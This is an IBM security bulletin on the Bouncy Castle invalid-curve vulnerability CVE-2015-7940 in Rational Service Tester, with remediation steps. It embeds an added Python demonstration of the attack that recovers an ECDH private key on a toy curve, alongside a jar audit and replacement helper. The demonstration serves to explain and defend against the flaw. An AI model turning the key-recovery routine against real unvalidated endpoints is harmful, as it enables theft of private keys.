IBM Support

Security Bulletin: A vulnerability in Bouncy Castle affects Rational Service Tester (CVE-2015-7940)

Created by Kevin Mooney on

Security Bulletin


Summary

Bouncy Castle could allow a remote attacker to obtain sensitive information, caused by missing validation that a received elliptic curve point lies on the expected curve (an invalid curve attack). An attacker could exploit this vulnerability to extract private keys used in elliptic curve cryptography and obtain sensitive information.

Vulnerability Details

CVEID: CVE-2015-7940
DESCRIPTION:
Bouncy Castle could allow a remote attacker to obtain sensitive information. An attacker could exploit this vulnerability using an invalid curve attack to extract private keys used in elliptic curve cryptography and obtain sensitive information.
CVSS Base Score: 5.3
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/107739 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
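The invalid curve attack named above, as an added illustration that is not IBM's or Bouncy Castle's code: a toy ECDH responder over a constructed 97-element curve, the attack that recovers its private key when the responder multiplies any point it is handed, and the on-curve check that stops it. The curve parameters P, A and B, the secret 77 and every function name are constructed for this example and correspond to no real curve or library API.

```python
"""Toy invalid-curve attack against an ECDH responder that skips point validation.

Constructed illustration for CVE-2015-7940. The curve y^2 = x^3 + A*x + B over GF(P)
with P = 97 is a toy; nothing here is Bouncy Castle's code or a real-world curve.
"""
from math import isqrt

P, A, B = 97, 2, 3          # constructed toy curve E


def ec_add(pt1, pt2, a, p):
    """Affine short-Weierstrass addition; None is the point at infinity.
    The formulas never use the constant b, so a point on a *different* curve with the
    same a is processed without any arithmetic error. That is the root of the attack."""
    if pt1 is None:
        return pt2
    if pt2 is None:
        return pt1
    x1, y1 = pt1
    x2, y2 = pt2
    if x1 == x2 and (y1 + y2) % p == 0:
        return None
    if pt1 == pt2:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def ec_mul(k, pt, a, p):
    """Double-and-add scalar multiplication."""
    result, addend = None, pt
    while k > 0:
        if k & 1:
            result = ec_add(result, addend, a, p)
        addend = ec_add(addend, addend, a, p)
        k >>= 1
    return result


def on_curve(pt, a, b, p):
    """The check the fixed library performs: reject infinity and off-curve points."""
    if pt is None:
        return False
    x, y = pt
    return 0 <= x < p and 0 <= y < p and (y * y - (x ** 3 + a * x + b)) % p == 0


def curve_points(a, b, p):
    """All affine points of y^2 = x^3 + a x + b over GF(p); brute force, p is tiny."""
    roots = {}
    for y in range(p):
        roots.setdefault(y * y % p, []).append(y)
    return [(x, y) for x in range(p) for y in roots.get((x ** 3 + a * x + b) % p, [])]


def point_order(pt, a, p):
    order, acc = 1, pt
    while acc is not None:
        acc = ec_add(acc, pt, a, p)
        order += 1
    return order


def is_prime(n):
    return n >= 2 and all(n % d for d in range(2, isqrt(n) + 1))


def vulnerable_ecdh(priv, peer_pt):
    """Responder that multiplies whatever point it receives (pre-1.51 behaviour)."""
    return ec_mul(priv, peer_pt, A, P)


def fixed_ecdh(priv, peer_pt):
    """Responder that validates the peer point against E before using it."""
    if not on_curve(peer_pt, A, B, P):
        raise ValueError("peer public key is not on the curve")
    return ec_mul(priv, peer_pt, A, P)


def small_order_points(a, p, needed):
    """Points of distinct prime order on curves y^2 = x^3 + a x + b' (b' != B),
    collected until the product of the orders exceeds `needed`."""
    found, product = [], 1
    for b in range(p):
        if b == B or (4 * a ** 3 + 27 * b * b) % p == 0:   # skip E itself and singular curves
            continue
        for pt in curve_points(a, b, p):
            r = point_order(pt, a, p)
            if is_prime(r) and r not in [o for _, o in found]:
                found.append((pt, r))
                product *= r
                if product > needed:
                    return found
    raise RuntimeError("not enough small-order points")


def crt(residues):
    """Combine (value, modulus) pairs with pairwise coprime moduli (Garner's form)."""
    x, m = 0, 1
    for r, mod in residues:
        x += m * ((r - x) * pow(m, -1, mod) % mod)
        m *= mod
    return x % m


def recover_private_key(oracle, a, b, p):
    """Query `oracle` with off-curve small-order points, brute-force d mod r for each,
    and combine with the CRT. The group order of E bounds the secret."""
    bound = len(curve_points(a, b, p)) + 1
    residues = []
    for pt, r in small_order_points(a, p, bound):
        shared = oracle(pt)
        k = next(k for k in range(r) if ec_mul(k, pt, a, p) == shared)
        residues.append((k, r))
    return crt(residues)


if __name__ == "__main__":
    secret = 77   # constructed victim key
    print("recovered:", recover_private_key(lambda q: vulnerable_ecdh(secret, q), A, B, P))
    try:
        recover_private_key(lambda q: fixed_ecdh(secret, q), A, B, P)
    except ValueError as exc:
        print("fixed responder refused:", exc)
```

Each oracle query leaks d modulo one small prime; with P = 97 a handful of queries already exceeds the group order, so the secret is recovered exactly. On a 256-bit curve the attacker needs more queries, but the per-query cost is the same brute force over a tiny subgroup, which is why the only effective defence is the on-curve check in `fixed_ecdh` (and, for real deployments, rejecting the point at infinity and low-order points as well).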

Affected Products and Versions

RST versions 8.2.*, 8.3.*, 8.5.*, 8.6.*, 8.7.*.

Remediation/Fixes

It is strongly recommended to upgrade to RST version 9.0.

For older releases, you can alternatively update the Bouncy Castle library manually:


1) Download Bouncy Castle version 1.54 (the jar can be downloaded from https://www.bouncycastle.org/download/jce-jdk13-154.jar).
2) Locate the previously delivered Bouncy Castle library; it is typically at the following path:
INSTALLATION_DIRECTORY/IBM_SHARED_PLUGINS/plugins/com.ibm.rational.ttt.common.models.core_plugin_version/lib/approvedbouncy
For example:
C:\Program Files\IBM\IBMIMSharedRPT8702\plugins\com.ibm.rational.ttt.common.models.core_8.5.210.v20150622_1524\lib\approvedbouncy
for RPT v8.7.0.2.
3) Rename the downloaded Bouncy Castle 1.54 jar to the name of the previously delivered jar (jce-jdk13-134.jar).
4) Replace the old jar with the new one (keep a copy of the original jar so the change can be reverted).
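A helper for the four steps above, added here as an example and not IBM's or Bouncy Castle's code: it finds every jar under a `lib/approvedbouncy` directory, reads the version from the jar's own manifest, flags anything older than 1.51 (the first Bouncy Castle release that fixes CVE-2015-7940), and performs the backup-and-replace. It reads the manifest rather than the filename because step 3 renames the 1.54 jar to `jce-jdk13-134.jar`, so after a successful update the filename still says 1.34. It assumes the jar's `META-INF/MANIFEST.MF` carries an `Implementation-Version` or `Bundle-Version` header, as Bouncy Castle releases do, and falls back to the `jce-jdk13-NNN.jar` naming otherwise; the directory layout in `run_demo` is constructed to mirror the path in step 2.

```python
"""Locate, version-check and replace the Bouncy Castle jar under lib/approvedbouncy.

Added helper for the manual procedure in the bulletin; not IBM's or Bouncy Castle's code.
Assumes the jar manifest carries Implementation-Version or Bundle-Version; falls back to
the jce-jdk13-NNN.jar filename when it does not.
"""
import re
import shutil
import tempfile
import zipfile
from pathlib import Path

FIRST_FIXED = (1, 51)    # CVE-2015-7940 is fixed in Bouncy Castle 1.51 and later
_FILENAME_RE = re.compile(r"jce-jdk13-(\d)(\d+)\.jar$")


def version_from_manifest(text):
    """Parse '1.54.0' (or '1.54') out of a manifest; returns a tuple or None."""
    m = re.search(r"^(?:Implementation|Bundle)-Version:\s*(\d+(?:\.\d+)+)", text, re.M)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def jar_version(jar):
    """Prefer the manifest: after step 3 the file keeps the old name, so the filename
    alone would still report 1.34 after a successful update."""
    jar = Path(jar)
    try:
        with zipfile.ZipFile(jar) as zf:
            v = version_from_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
            if v:
                return v
    except (OSError, zipfile.BadZipFile, KeyError):
        pass
    m = _FILENAME_RE.search(jar.name)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_vulnerable(version):
    """Unknown version is treated as vulnerable rather than silently passing."""
    return version is None or version < FIRST_FIXED


def find_approvedbouncy_jars(install_root):
    """Every jar under */lib/approvedbouncy in the shared plugins tree (step 2)."""
    return sorted(Path(install_root).glob("**/lib/approvedbouncy/*.jar"))


def replace_jar(old_jar, new_jar):
    """Steps 3 and 4: keep a backup, then install the new jar under the old jar's name."""
    old_jar, new_jar = Path(old_jar), Path(new_jar)
    backup = old_jar.with_suffix(old_jar.suffix + ".bak")
    shutil.copy2(old_jar, backup)
    shutil.copy2(new_jar, old_jar)
    return backup


def audit(install_root):
    """Return {jar_path: (version, vulnerable)} for every approvedbouncy jar found."""
    report = {}
    for jar in find_approvedbouncy_jars(install_root):
        v = jar_version(jar)
        report[jar] = (v, is_vulnerable(v))
    return report


def make_fake_jar(path, version):
    """Constructed stand-in for a Bouncy Castle jar: a manifest only, no classes."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")


def run_demo():
    """Walk through the procedure on a constructed directory layout; returns the
    audit result for the shipped jar before and after the replacement."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        lib = (root / "plugins"
               / "com.ibm.rational.ttt.common.models.core_8.5.210.v20150622_1524"
               / "lib" / "approvedbouncy")
        lib.mkdir(parents=True)
        old = lib / "jce-jdk13-134.jar"            # what the product shipped
        make_fake_jar(old, "1.34.0")
        download = root / "jce-jdk13-154.jar"      # what step 1 downloads
        make_fake_jar(download, "1.54.0")
        before = audit(root)[old]
        replace_jar(old, download)
        after = audit(root)[old]                   # same filename, new manifest
        return before, after


if __name__ == "__main__":
    print(run_demo())
```

Run `audit(<install root>)` against a real installation before and after the manual update; a jar that still reports a version below 1.51 under its new name means the copy in step 4 did not land in the directory the product actually loads from.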

Workarounds and Mitigations

None.

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the X-Force link given under Vulnerability Details in this Security Bulletin.

Disclaimer

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

Product: IBM Rational Service Tester for SOA Quality (SSNKWF)
Component: Test Execution
Platforms: Linux, Windows
Versions: 8.2; 8.2.0.1; 8.2.0.2; 8.2.0.3; 8.2.0.4; 8.2.0.5; 8.2.0.6; 8.2.1; 8.2.1.1; 8.2.1.2; 8.2.1.3; 8.2.1.4; 8.2.1.5; 8.3; 8.3.0.1; 8.3.0.2; 8.3.0.3; 8.5; 8.5.0.1; 8.5.0.2; 8.5.1; 8.5.1.1; 8.5.1.2; 8.5.1.3; 8.6; 8.6.0.1; 8.6.0.2; 8.7; 8.7.0.1; 8.7.0.2; 8.7.1; 8.7.1.1

Document Information

Modified date:
17 June 2018

UID

swg21978823